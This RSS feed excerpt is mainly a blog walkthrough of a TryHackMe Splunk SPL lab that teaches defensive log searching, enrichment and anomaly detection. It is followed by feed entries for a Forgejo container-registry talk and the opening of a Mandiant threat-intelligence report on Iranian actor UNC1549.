<content:encoded><![CDATA[<h4>Hands-on Splunk SPL walkthrough covering searching, filtering, structuring, transforming, enrichment, and anomaly detection from a practical SOC analyst perspective.</h4><h4>Cybersecurity | Splunk | SIEM | SPL | Threat Hunting | SOC Analysis</h4><p>Security analysts deal with overwhelming amounts of telemetry every single day. Authentication logs, process executions, network events, registry modifications, suspicious scripts, everything eventually becomes part of the noise.</p><p>Without the ability to efficiently search, filter, and transform that data, incident response becomes painful very quickly.</p><p>That is where Splunk’s Search Processing Language (SPL) becomes incredibly powerful.</p><p>In this walkthrough, I’ll document my practical exploration of the <em>Splunk Exploring SPL</em> TryHackMe lab while approaching it from a real-world SOC analyst perspective. Instead of simply solving flags, the focus here is understanding <em>why</em> each query matters and how similar workflows apply during actual investigations.</p><p>We’ll cover:</p><ul><li>Search &amp; Reporting fundamentals</li><li>SPL operators and filtering logic</li><li>Structuring investigation timelines</li><li>Transforming noisy logs into actionable intelligence</li><li>Threat hunting using anomaly detection</li><li>Practical enrichment techniques for analysts</li></ul><p>Let’s jump in.</p><h3>Understanding Splunk Search &amp; Reporting</h3><p>Splunk’s Search &amp; Reporting App is where analysts spend most of their investigative time.</p><p>Core interface components include:</p><ul><li>Search Head → Where SPL queries are written</li><li>Time Picker → Controls investigation scope</li><li>Search History → Useful for revisiting prior searches</li><li>Data Summary → Quick overview of available hosts, sources, and sourcetypes</li></ul><p>In a real SOC environment, selecting the wrong timeframe can completely distort findings. A suspicious event hidden in “All Time” may immediately stand out in a tighter investigation window.</p><h3>First Search: Exploring the Dataset</h3><p>The first step is always understanding what data exists.</p><p>Since this lab uses the windowslogs index, the natural starting point is a broad search.</p><h3>PAYLOAD</h3><pre>index=windowslogs</pre><p>This query tells Splunk:</p><ul><li>Search the windowslogs index</li><li>Return every matching event</li></ul><p>Think of an index like a structured data container holding a particular category of logs.</p><p>The result:</p><p>12256 total events</p><p>This immediately gives us situational awareness regarding investigation scale.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*HdcCeuNSPQ9vu5qE.png"></figure><h3>Investigating the Fields Sidebar</h3><p>One of Splunk’s most useful reconnaissance tools is the Fields Sidebar.</p><p>Instead of blindly guessing field names, it helps analysts inspect:</p><ul><li>parsed fields</li><li>interesting values</li><li>top-occurring entries</li><li>numeric fields</li><li>string-based fields</li><li>event distributions</li></ul><p>This becomes incredibly useful during exploratory threat hunting.</p><p>For example, after loading the full dataset, we can inspect:</p><p>More Fields → SourceIP</p><p>to determine which source IP generated the highest activity.</p><p>That revealed:</p><p>172.90.12.11</p><p>This kind of quick pivoting is common during triage investigations.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*9fsKAQfWZZhC-YVR.png"></figure><h3>Time-Bounded Event Investigation</h3><p>Time filtering is one of the most important investigation skills in any SIEM.</p><p>Instead of reviewing the entire dataset, the lab required narrowing the scope to:</p><p>04/15/2022 from 08:05 AM to 08:06 AM</p><p>This returned:</p><p>134 events</p><p>A single minute of logs producing over a hundred events is a practical reminder of how noisy enterprise environments can become.</p><p>Proper time scoping often makes the difference between efficient investigation and chaos.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*d42iC6EJpk9u8T1p.png"></figure><h3>Search Operators in SPL</h3><p>Searching raw logs is useful, but the real strength of SPL comes from operators.</p><p>Operators allow us to:</p><ul><li>compare values</li><li>combine conditions</li><li>exclude noise</li><li>search patterns</li><li>create precise hunting logic</li></ul><h3>Free Text Search</h3><p>A quick free-text search looks like this:</p><h3>PAYLOAD</h3><pre>index=windowslogs alice</pre><p>This searches for the keyword:</p><p>alice</p><p>across the indexed events.</p><p>Free-text searching is especially useful when:</p><ul><li>exact field names are unknown</li><li>rapid exploratory hunting is needed</li><li>IOC validation begins</li></ul><p>This is often the fastest first move during incident triage.</p><h3>Relational Operators</h3><p>Splunk supports relational operators such as:</p><ul><li>=</li><li>!=</li><li>&lt;</li><li>&gt;</li><li>&lt;=</li><li>&gt;=</li></ul><p>These allow direct comparison-based filtering.</p><p>A practical example is excluding noisy system-generated events.</p><h3>Filtering SYSTEM Account Noise</h3><h3>PAYLOAD</h3><pre>index=windowslogs AccountName!=SYSTEM</pre><p>This query:</p><ul><li>searches all Windows logs</li><li>excludes events where AccountName = SYSTEM</li></ul><p>Why this matters:</p><p>SYSTEM accounts generate enormous amounts of legitimate telemetry.</p><p>Filtering them helps analysts focus on human-driven activity, where suspicious behavior is usually easier to spot.</p><h3>Successful Authentication Events</h3><p>Windows authentication investigations frequently begin with Event IDs.</p><p>For successful logons:</p><h3>PAYLOAD</h3><pre>index=windowslogs EventID=4624</pre><p>Event ID:</p><p>4624 = Successful Logon</p><p>This returned:</p><p>26 events</p><p>This query is directly relevant for:</p><ul><li>authentication investigations</li><li>brute-force review</li><li>credential abuse analysis</li><li>lateral movement detection</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*VqaYnQ1Lz2XeX9T5.png"></figure><h3>Logical Operators</h3><p>Splunk also supports standard logical operators:</p><ul><li>AND</li><li>OR</li><li>NOT</li><li>IN</li></ul><p>These allow multi-condition filtering.</p><h3>Investigating Specific Network Activity</h3><p>Suppose we want to isolate traffic involving a particular host and service.</p><h3>PAYLOAD</h3><pre>index=windowslogs DestinationIp=172.18.39.6 DestinationPort=135</pre><p>This filters events involving:</p><ul><li>destination IP: 172.18.39.6</li><li>destination port: 135</li></ul><p>Returned:</p><p>4 events</p><p>Why port 135 matters:</p><p>Port 135 commonly relates to:</p><ul><li>RPC communication</li><li>Windows remote service interaction</li><li>potential lateral movement behavior</li></ul><p>That makes it interesting from a defender’s perspective.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*GDLzgLD9JAjejB9e.png"></figure><h3>Host-Specific Source IP Analysis</h3><p>Now let’s narrow activity further.</p><h3>PAYLOAD</h3><pre>index=windowslogs Hostname=Salena.Adam DestinationIp=172.18.38.5<br>| stats count by SourceIp</pre><p>Breakdown:</p><p>First:</p><pre>index=windowslogs Hostname=Salena.Adam DestinationIp=172.18.38.5</pre><p>Filters events involving:</p><ul><li>host Salena.Adam</li><li>destination 172.18.38.5</li></ul><p>Then:</p><pre>| stats count by SourceIp</pre><p>Groups matching events by source IP and counts occurrences.</p><p>This transforms raw logs into summarized intelligence.</p><p>Highest result:</p><p>172.90.12.11</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*BVum6PdVDQKe7cYF.png"></figure><h3>Wildcard Searches</h3><p>Wildcards become useful when exact values are unknown.</p><p>Example:</p><h3>PAYLOAD</h3><pre>index=windowslogs cyber*</pre><p>This searches for terms beginning with:</p><p>cyber</p><p>Result:</p><p>12256 events</p><p>Meaning the wildcard matched the full dataset scope here.</p><p>Wildcards are useful for:</p><ul><li>IOC family matching</li><li>filename hunting</li><li>partial string searches</li><li>process pattern discovery</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*m3DsHJp7egoV65nV.png"></figure><h3>Order of Evaluation in SPL</h3><p>One subtle but important SPL behavior:</p><p>OR takes precedence over AND</p><p>Example:</p><pre>alice AND bob OR charlie</pre><p>Splunk evaluates this as:</p><pre>alice AND (bob OR charlie)</pre><p>This can dramatically alter results if misunderstood.</p><p>The operator with the lowest priority:</p><p>AND</p><p>Parentheses should always be used for complex hunting logic.</p><h3>Filtering Results in SPL</h3><p>By this point, we already know how quickly raw event streams become overwhelming.</p><p>Enterprise environments generate massive telemetry continuously, and hunting for anomalies without filtering is basically self-inflicted suffering.</p><p>This is where SPL filtering commands become essential.</p><p>Rather than manually digging through thousands of events, we refine datasets step by step.</p><h3>The fields Command</h3><p>The fields command allows analysts to explicitly include or exclude fields from search results.</p><p>This improves:</p><ul><li>readability</li><li>investigation speed</li><li>focus during triage</li></ul><p>Instead of showing every extracted field, we only surface what matters.</p><h3>PAYLOAD</h3><pre>index=windowslogs<br>| fields Domain SourceProcessId TargetProcessId</pre><p>Breakdown:</p><pre>index=windowslogs</pre><p>Loads the Windows event dataset.</p><p>Then:</p><pre>| fields Domain SourceProcessId TargetProcessId</pre><p>Restricts visible output to:</p><ul><li>Domain</li><li>SourceProcessId</li><li>TargetProcessId</li></ul><p>This is incredibly useful when dealing with noisy event records containing dozens of irrelevant fields.</p><p>Result:</p><p>Highest SourceProcessId: 9496</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*bLaLRYHqtqK-sBc8.png"></figure><h3>Why Process IDs Matter</h3><p>Process IDs are highly useful in endpoint investigations.</p><p>They help analysts:</p><ul><li>track parent-child execution relationships</li><li>reconstruct process trees</li><li>identify suspicious process spawning</li><li>correlate endpoint behavior</li></ul><p>Example:</p><p>If PowerShell launches cmd.exe, process relationships can reveal execution flow immediately.</p><h3>The regex Command</h3><p>Exact string matching is useful — but sometimes insufficient.</p><p>This is where regular expressions become powerful.</p><p>Splunk supports PCRE (Perl Compatible Regular Expressions), allowing pattern-based filtering.</p><h3>Registry Pattern Matching</h3><p>In this case, we wanted to locate registry-related objects ending with:</p><p>Manager</p><h3>PAYLOAD</h3><pre>index=windowslogs<br>| regex TargetObject="Manager$"</pre><p>Breakdown:</p><pre>TargetObject="Manager$"</pre><p>The $ symbol means:</p><p>end of string</p><p>So this query matches values whose final text is exactly:</p><p>Manager</p><p>Result:</p><p>HKLM\SOFTWARE\Microsoft\SecurityManager</p><p>This is especially useful for:</p><ul><li>registry hunting</li><li>persistence investigations</li><li>malware artifact analysis</li><li>inconsistent string matching</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*Ye_EgfDFLOJONwbA.png"></figure><h3>Structuring Results for Investigation</h3><p>Filtering reduces noise.</p><p>Structuring improves readability.</p><p>Raw logs are terrible for incident storytelling.</p><p>Structured output helps analysts quickly understand event flow.</p><h3>The table Command</h3><p>The table command creates clean, readable output using only selected fields.</p><p>This is one of the most useful commands during investigations.</p><h3>PAYLOAD</h3><pre>index=windowslogs<br>| table EventID AccountName AccountType</pre><p>This displays only:</p><ul><li>EventID</li><li>AccountName</li><li>AccountType</li></ul><p>Result:</p><p>First AccountName: SYSTEM</p><p>This is far cleaner than reading raw event blobs.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*J6GrcEx6dCft0wup.png"></figure><h3>Why Structured Tables Matter</h3><p>Tables are useful for:</p><ul><li>timeline analysis</li><li>investigation reporting</li><li>stakeholder communication</li><li>correlation review</li></ul><p>A readable table is far more useful than scrolling raw XML-like event data.</p><h3>Reversing Timeline Order</h3><p>Splunk usually displays newer events first.</p><p>But sometimes investigations require chronological order.</p><p>That’s where reverse helps.</p><h3>PAYLOAD</h3><pre>index=windowslogs<br>| table EventID AccountName AccountType<br>| reverse</pre><p>This flips event ordering.</p><p>Result:</p><p>First EventID: 800</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*ouPOutF6hbl0-0sd.png"></figure><h3>Why Chronological Reconstruction Matters</h3><p>Attack investigations often follow sequence.</p><p>Example:</p><ol><li>Initial access</li><li>Authentication</li><li>Process execution</li><li>Credential dumping</li><li>Registry persistence</li><li>Lateral movement</li></ol><p>Chronology makes attack flow obvious.</p><h3>Timeline-Based Process Investigation</h3><p>Now let’s investigate process execution history.</p><h3>PAYLOAD</h3><pre>index=windowslogs EventID=1<br>| table _time ParentProcessId ProcessId ParentCommandLine CommandLine<br>| reverse</pre><p>Breakdown:</p><pre>EventID=1</pre><p>Focuses on process creation telemetry.</p><p>Then:</p><pre>| table</pre><p>Structures the output.</p><p>Finally:</p><pre>| reverse</pre><p>Shows oldest events first.</p><p>Displayed fields:</p><ul><li>timestamp</li><li>parent process ID</li><li>process ID</li><li>parent command line</li><li>child command line</li></ul><p>This is excellent for reconstructing execution chains.</p><h3>Credential Discovery via Command-Line Visibility</h3><p>During this timeline investigation, a credential appeared directly in process arguments.</p><p>Discovered password:</p><p>paw0rd1</p><p>This is exactly why defenders love command-line logging.</p><p>Attackers frequently expose:</p><ul><li>plaintext passwords</li><li>execution arguments</li><li>malicious scripts</li><li>tool usage</li><li>automation commands</li></ul><p>Visibility here can dramatically accelerate investigations.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*WcZWDQjePTxTCESf.png"></figure><h3>Transforming Commands</h3><p>Filtering narrows datasets.</p><p>Transforming commands summarize them.</p><p>Instead of thousands of raw rows, transforming searches create:</p><ul><li>statistics</li><li>trends</li><li>ranked outputs</li><li>intelligence summaries</li></ul><p>Common examples:</p><ul><li>top</li><li>stats</li><li>chart</li><li>timechart</li><li>rare</li></ul><h3>Frequency Analysis with top</h3><p>The top command identifies frequently occurring field values.</p><p>Useful for spotting dominant patterns.</p><h3>PAYLOAD</h3><pre>index=windowslogs EventID=1<br>| top Image</pre><p>Breakdown:</p><p>Focus on:</p><pre>EventID=1</pre><p>(process creation telemetry)</p><p>Then:</p><pre>| top Image</pre><p>Returns the most common executable image values.</p><p>Result:</p><pre>C:\Windows\System32\BackgroundTransferHost.exe</pre><p>This helps establish behavioral baselines.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*o5xBz098hl1VXzZ4.png"></figure><h3>Why Frequency Analysis Matters</h3><p>Normal recurring binaries:</p><ul><li>explorer.exe</li><li>svchost.exe</li><li>chrome.exe</li></ul><p>Potentially suspicious recurring binaries:</p><ul><li>powershell.exe</li><li>cmd.exe</li><li>certutil.exe</li><li>rundll32.exe</li><li>mshta.exe</li></ul><p>Frequency often reveals behavioral patterns quickly.</p><h3>Geolocation Enrichment with iplocation</h3><p>Context matters.</p><p>IP addresses alone are not very informative.</p><p>Splunk’s iplocation command enriches IP data with geographic metadata.</p><h3>PAYLOAD</h3><pre>index=windowslogs<br>| iplocation SourceIp<br>| stats count by Region</pre><p>Breakdown:</p><pre>| iplocation SourceIp</pre><p>Enriches IP addresses.</p><p>Then:</p><pre>| stats count by Region</pre><p>Summarizes event counts geographically.</p><p>Result:</p><p>California</p><p>Geolocation enrichment is useful for:</p><ul><li>suspicious foreign access</li><li>impossible travel investigations</li><li>cloud-origin traffic review</li><li>VPN anomaly analysis</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*j_4aOplJLAUYEddN.png"></figure><h3>Risk-Based Lookup Enrichment</h3><p>External lookup tables add contextual intelligence.</p><p>This is hugely valuable in production SOC environments.</p><h3>PAYLOAD</h3><pre>index=windowslogs<br>| lookup image_riskscore Image OUTPUT RiskScore<br>| stats count by Image RiskScore<br>| sort - RiskScore</pre><p>Breakdown:</p><pre>| lookup</pre><p>Matches process image names against an external risk database.</p><p>Then:</p><pre>| stats</pre><p>Aggregates the results.</p><p>Finally:</p><pre>| sort - RiskScore</pre><p>Shows highest-risk entries first.</p><p>Result:</p><pre>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</pre><p>This makes sense — PowerShell is frequently abused for offensive activity.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*7LMDwzEJaKsO2gMx.png"></figure><h3>Why Lookups Matter in Real SOC Operations</h3><p>Lookups commonly provide:</p><ul><li>IOC intelligence</li><li>malware reputation</li><li>user role context</li><li>asset classification</li><li>vulnerability severity</li><li>business criticality mapping</li></ul><p>Without enrichment, logs are just raw data.</p><p>With enrichment, they become actionable intelligence.</p><h3>Anomaly Detection with SPL</h3><p>Not every malicious event screams for attention.</p><p>Some of the most interesting threats hide inside what initially appears to be legitimate activity.</p><p>A valid VPN login. A known employee account. A familiar IP range. A routine process.</p><p>This is why anomaly detection matters.</p><p>Instead of asking:</p><p>“Is this explicitly malicious?”</p><p>we ask:</p><p>“Is this behavior unusual?”</p><p>That shift is where threat hunting becomes significantly more effective.</p><h3>Detecting Outliers by Country</h3><p>Imagine reviewing a VPN dataset containing thousands of login events.</p><p>Each record contains:</p><ul><li>login timestamp</li><li>username</li><li>source IP</li><li>source country</li></ul><p>At first glance, nothing looks suspicious.</p><p>But what if a user who always logs in from one region suddenly appears from a completely different country?</p><p>That is exactly what we’re hunting for.</p><h3>PAYLOAD</h3><pre>index=vpnlogs<br>| eventstats count as logins_by_user by user<br>| eventstats count as logins_by_user_country by user src_country<br>| eval country_freq=logins_by_user_country/logins_by_user<br>| where country_freq &lt; 0.1<br>| table _time user src_ip src_country country_freq</pre><p>Let’s break this down.</p><h3>Step 1: Count Total Logins Per User</h3><pre>| eventstats count as logins_by_user by user</pre><p>This calculates:</p><p>Total login events per user</p><p>Example:</p><p>If user kbrown logged in 200 times:</p><pre>logins_by_user = 200</pre><p>Unlike stats, eventstats preserves raw events while appending calculated values.</p><p>That makes it perfect for enrichment-style analysis.</p><h3>Step 2: Count User Logins Per Country</h3><pre>| eventstats count as logins_by_user_country by user src_country</pre><p>Now we calculate:</p><p>How many times each user logged in from each country</p><p>Example:</p><p>If kbrown logged in only once from Japan:</p><pre>logins_by_user_country = 1</pre><h3>Step 3: Calculate Behavioral Frequency</h3><pre>| eval country_freq=logins_by_user_country/logins_by_user</pre><p>This creates a behavioral ratio.</p><p>Example:</p><pre>1 / 200 = 0.005</pre><p>Meaning:</p><p>That country accounts for only 0.5% of the user’s login behavior.</p><p>That’s interesting.</p><h3>Step 4: Filter Rare Behavior</h3><pre>| where country_freq &lt; 0.1</pre><p>This keeps only behaviors occurring less than 10% of the time.</p><p>That threshold defines anomaly sensitivity.</p><p>Lower threshold:</p><ul><li>stricter detections</li><li>fewer false positives</li></ul><p>Higher threshold:</p><ul><li>noisier results</li><li>broader detection</li></ul><h3>Step 5: Investigation-Friendly Output</h3><pre>| table _time user src_ip src_country country_freq</pre><p>Creates readable analyst output.</p><p>Instead of messy raw events, we now get structured suspicious login candidates.</p><p>Result:</p><p>Outlier user:</p><p>jsmith</p><p>Anomalous country:</p><p>JP</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*MrSPFjnU1jTxPz09.png"></figure><h3>Why This Matters</h3><p>Traditional rule-based detection might ignore:</p><p>“Valid user successfully authenticated.”</p><p>Behavioral detection asks:</p><p>“Why is this user suddenly authenticating from Japan?”</p><p>That context changes everything.</p><h3>Detecting Suspicious Login Hours</h3><p>Geographic anomalies are useful.</p><p>But attackers can also reveal themselves through strange timing.</p><p>Example:</p><p>An employee usually logs in around:</p><p>1 PM</p><p>Then suddenly authenticates at:</p><p>3 AM</p><p>That deserves attention.</p><h3>PAYLOAD</h3><pre>index=vpnlogs<br>| eval hour=tonumber(strftime(_time, "%H")) + tonumber(strftime(_time, "%M"))/60<br>| eventstats avg(hour) as typical_hour stdev(hour) as stdev_hour by user<br>| eval zscore=abs(hour - typical_hour) / stdev_hour<br>| where zscore &gt; 3<br>| eval hour=round(hour, 2), typical_hour=round(typical_hour, 2)<br>| eval stdev_hour=round(stdev_hour, 2), zscore=round(zscore, 2)<br>| table _time user src_ip src_country hour typical_hour stdev_hour zscore<br>| sort - hour_zscore</pre><p>This is practical statistical anomaly hunting.</p><h3>Step 1: Convert Time into Numeric Hours</h3><pre>| eval hour=tonumber(strftime(_time, "%H")) + tonumber(strftime(_time, "%M"))/60</pre><p>Examples:</p><ul><li>13:30 → 13.5</li><li>18:15 → 18.25</li><li>03:00 → 3.0</li></ul><p>Why?</p><p>Because statistical analysis requires numeric values.</p><h3>Step 2: Learn Normal Login Behavior</h3><pre>| eventstats avg(hour) as typical_hour stdev(hour) as stdev_hour by user</pre><p>This calculates:</p><ul><li>average login hour</li><li>standard deviation</li></ul><p>Example:</p><pre>typical_hour = 13.5<br>stdev_hour = 0.8</pre><p>Meaning:</p><p>User normally logs in around 1:30 PM, with relatively predictable behavior.</p><h3>Step 3: Calculate Z-Score</h3><pre>| eval zscore=abs(hour - typical_hour) / stdev_hour</pre><p>Z-score measures anomaly severity.</p><p>Interpretation:</p><ul><li>1 → slightly unusual</li><li>2 → notable</li><li>3+ → highly suspicious</li></ul><p>Example:</p><p>Normal:</p><pre>13.5</pre><p>Observed:</p><pre>3.0</pre><p>That’s a major deviation.</p><h3>Step 4: Keep Only Strong Outliers</h3><pre>| where zscore &gt; 3</pre><p>This aggressively reduces noise.</p><p>Only statistically significant anomalies survive.</p><h3>Step 5: Investigation Output</h3><pre>| table</pre><p>Creates structured review output for analysts.</p><h3>Result</h3><p>Suspicious user:</p><p>njackson</p><p>Observed login:</p><p>3 AM</p><p>That is highly abnormal compared to baseline behavior.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*nFCehhrszDvCX_fW.png"></figure><h3>Why Statistical Detection Is Smarter</h3><p>Naive rule:</p><blockquote><em>Alert on every 3 AM login</em></blockquote><p>Problem:</p><p>Night-shift employees trigger endless false positives.</p><p>Behavioral detection instead asks:</p><blockquote><em>Is 3 AM unusual for THIS specific user?</em></blockquote><p>That’s significantly more intelligent.</p><h3>Real-World Takeaways</h3><p>This room reinforces practical SOC investigation workflows.</p><h3>Search &amp; Filtering</h3><p>Useful for:</p><ul><li>authentication review</li><li>IOC hunting</li><li>endpoint triage</li><li>log scoping</li></ul><p>Commands used:</p><ul><li>search</li><li>operators</li><li>fields</li><li>regex</li></ul><h3>Structuring</h3><p>Useful for:</p><ul><li>timelines</li><li>reporting</li><li>investigation readability</li></ul><p>Commands used:</p><ul><li>table</li><li>reverse</li></ul><h3>Transforming</h3><p>Useful for:</p><ul><li>baselining</li><li>summarization</li><li>pattern discovery</li></ul><p>Commands used:</p><ul><li>top</li><li>stats</li><li>chart</li><li>timechart</li></ul><h3>Enrichment</h3><p>Useful for:</p><ul><li>contextual intelligence</li><li>business-aware detection</li><li>suspicious origin analysis</li></ul><p>Commands used:</p><ul><li>iplocation</li><li>lookup</li></ul><h3>Behavioral Detection</h3><p>Useful for:</p><ul><li>compromised account hunting</li><li>insider threat detection</li><li>VPN anomaly analysis</li><li>unusual activity detection</li></ul><p>Commands used:</p><ul><li>eventstats</li><li>eval</li><li>where</li><li>statistical logic</li></ul><h3>Final Thoughts</h3><p>Splunk SPL is far more than just query syntax.</p><p>It is investigative thinking translated into search logic.</p><p>The real shift happens when you move from:</p><p>“I have logs.”</p><p>to:</p><p>“I understand what happened.”</p><p>That’s where analysts become hunters.</p><h3>Outro</h3><p>If this walkthrough helped you, feel free to connect with me:</p><p><strong>GitHub: </strong><a href="https://github.com/AdityaBhatt3010">https://github.com/AdityaBhatt3010</a><br><strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/adityabhatt3010/">https://www.linkedin.com/in/adityabhatt3010/</a><br><strong>Medium: </strong><a href="https://medium.com/@adityabhatt3010">https://medium.com/@adityabhatt3010</a></p><p>More writeups soon. Cleaner, deeper and built from too many late-night labs.</p><p>If you found this useful, consider starring the repository and following my cybersecurity journey.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=ff138c4c7d51" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/splunk-exploring-spl-a-practical-soc-analyst-walkthrough-for-search-detection-and-threat-hunting-ff138c4c7d51">Splunk Exploring SPL: A Practical SOC Analyst Walkthrough for Search, Detection, and Threat Hunting</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Popping podman/dockers bonnet: Unraveling the image pull process while developing for Forgejo (gpn24)]]></title>
<description><![CDATA[Developing an OCI image pull through cache for Forgejo had some interesting rabbit holes and it was surprisingly hard to get in depth information on a supposedly well known system. So I got to deep dive and do bits of research and reverse engineering to make the parts communicate properly.

In th...]]></description>
<link>https://tsecurity.de/de/3579377/it-security-video/popping-podmandockers-bonnet-unraveling-the-image-pull-process-while-developing-for-forgejo-gpn24/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3579377/it-security-video/popping-podmandockers-bonnet-unraveling-the-image-pull-process-while-developing-for-forgejo-gpn24/</guid>
<pubDate>Sun, 07 Jun 2026 14:47:10 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Developing an OCI image pull through cache for Forgejo had some interesting rabbit holes and it was surprisingly hard to get in depth information on a supposedly well known system. So I got to deep dive and do bits of research and reverse engineering to make the parts communicate properly.

In this talk I'll share my insights into the process of pulling OCI images according to the distribution spec (and its slight deviations) and try to answer questions like:
	- Which requests are sent by Podman or the Docker daemon when doing `docker pull image`?
		- Whats that with the /v2 endpoint and discovery?
		- How about authentication?
	- What does the pull sequence look like?
       	- Help, I got an index manifest, what should I do?
	- How should Forgejo communicate with the daemon for a successful pull?

If there is time, I'll also share small pieces of knowledge of where the implementation sits in the Forgejo codebase and how it interacts with the existing package registry.

- PR containing the implementation: https://codeberg.org/forgejo/forgejo/pulls/11611

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.gulas.ch/gpn24/talk/8SDDSH/]]></content:encoded>
</item>
<item>
<title><![CDATA[Erik: Popping podman/dockers bonnet: Unraveling the image pull process while developing for Forgejo]]></title>
<description><![CDATA[Author: media.ccc.de - Bewertung: 0x - Views:9 https://media.ccc.de/v/gpn24-532-popping-podman-dockers-bonnet-unraveling-the-image-pull-process-while-developing-for-forgejo

Developing an OCI image pull through cache for Forgejo had some interesting rabbit holes and it was surprisingly hard to ge...]]></description>
<link>https://tsecurity.de/de/3579376/it-security-video/erik-popping-podmandockers-bonnet-unraveling-the-image-pull-process-while-developing-for-forgejo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3579376/it-security-video/erik-popping-podmandockers-bonnet-unraveling-the-image-pull-process-while-developing-for-forgejo/</guid>
<pubDate>Sun, 07 Jun 2026 14:47:09 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: media.ccc.de - Bewertung: 0x - Views:9 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/cAEzeMn7ncg?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>https://media.ccc.de/v/gpn24-532-popping-podman-dockers-bonnet-unraveling-the-image-pull-process-while-developing-for-forgejo<br />
<br />
Developing an OCI image pull through cache for Forgejo had some interesting rabbit holes and it was surprisingly hard to get in depth information on a supposedly well known system. So I got to deep dive and do bits of research and reverse engineering to make the parts communicate properly.<br />
<br />
In this talk I'll share my insights into the process of pulling OCI images according to the distribution spec (and its slight deviations) and try to answer questions like:<br />
 - Which requests are sent by Podman or the Docker daemon when doing `docker pull image`?<br />
  - Whats that with the /v2 endpoint and discovery?<br />
  - How about authentication?<br />
 - What does the pull sequence look like?<br />
        - Help, I got an index manifest, what should I do?<br />
 - How should Forgejo communicate with the daemon for a successful pull?<br />
<br />
If there is time, I'll also share small pieces of knowledge of where the implementation sits in the Forgejo codebase and how it interacts with the existing package registry.<br />
<br />
- PR containing the implementation: https://codeberg.org/forgejo/forgejo/pulls/11611<br />
<br />
Erik<br />
<br />
https://cfp.gulas.ch/gpn24/talk/8SDDSH/<br />
<br />
#gpn24 #SoftwareandInfrastructure<br />
<br />
Licensed to the public under https://creativecommons.org/licenses/by/4.0/<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[When Cats Fly: Suspected Iranian Threat Actor UNC1549 Targets Israeli and Middle East Aerospace and Defense Sectors]]></title>
<description><![CDATA[Written by: Ofir Rozmann, Chen Evgi, Jonathan Leathery

 
Today Mandiant is releasing a blog post about suspected Iran-nexus espionage activity targeting the aerospace, aviation and defense industries in Middle East countries, including Israel and the United Arab Emirates (UAE) and potentially Tu...]]></description>
<link>https://tsecurity.de/de/3578876/it-security-nachrichten/when-cats-fly-suspected-iranian-threat-actor-unc1549-targets-israeli-and-middle-east-aerospace-and-defense-sectors/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578876/it-security-nachrichten/when-cats-fly-suspected-iranian-threat-actor-unc1549-targets-israeli-and-middle-east-aerospace-and-defense-sectors/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Ofir Rozmann, Chen Evgi, Jonathan Leathery</p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><p>Today Mandiant is releasing a blog post about <strong>suspected Iran-nexus espionage activity targeting the aerospace, aviation and defense industries in Middle East</strong> countries, including Israel and the United Arab Emirates (UAE) and potentially Turkey, India, and Albania. </p>
<p><strong>Mandiant attributes this activity with moderate confidence to the Iranian actor UNC1549</strong>, which overlaps with <strong>Tortoiseshell</strong>—a threat actor that has been publicly <a href="https://www.wired.com/story/facebook-iran-espionage-catfishing-us-military/" rel="noopener" target="_blank"><u>linked</u></a> to <strong>Iran’s Islamic Revolutionary Guard Corps (IRGC)</strong>. Tortoiseshell has previously attempted to compromise supply chains by targeting defense contractors and IT providers.  </p>
<p>The<strong> potential link between this activity and the Iranian IRGC</strong> is noteworthy given the focus on defense-related entities and the recent tensions with Iran in light of the Israel-Hamas war. Notably, Mandiant observed an<strong> Israel-Hamas war-themed campaign that masquerades as the “Bring Them Home Now” movement</strong>, which calls for the return of the Israelis kidnapped and held hostage by Hamas.</p>
<p>This suspected UNC1549 activity has been active since at least June 2022 and is still ongoing as of February 2024. While regional in nature and focused mostly in the Middle East, the targeting includes entities operating worldwide.</p>
<p>Mandiant observed this campaign<strong> </strong>deploy<strong> multiple evasion techniques</strong> to mask their activity, most prominently the <strong>extensive use of Microsoft Azure cloud infrastructure</strong> as well as <strong>social engineering schemes to disseminate two unique backdoors: MINIBIKE and MINIBUS</strong>.</p>
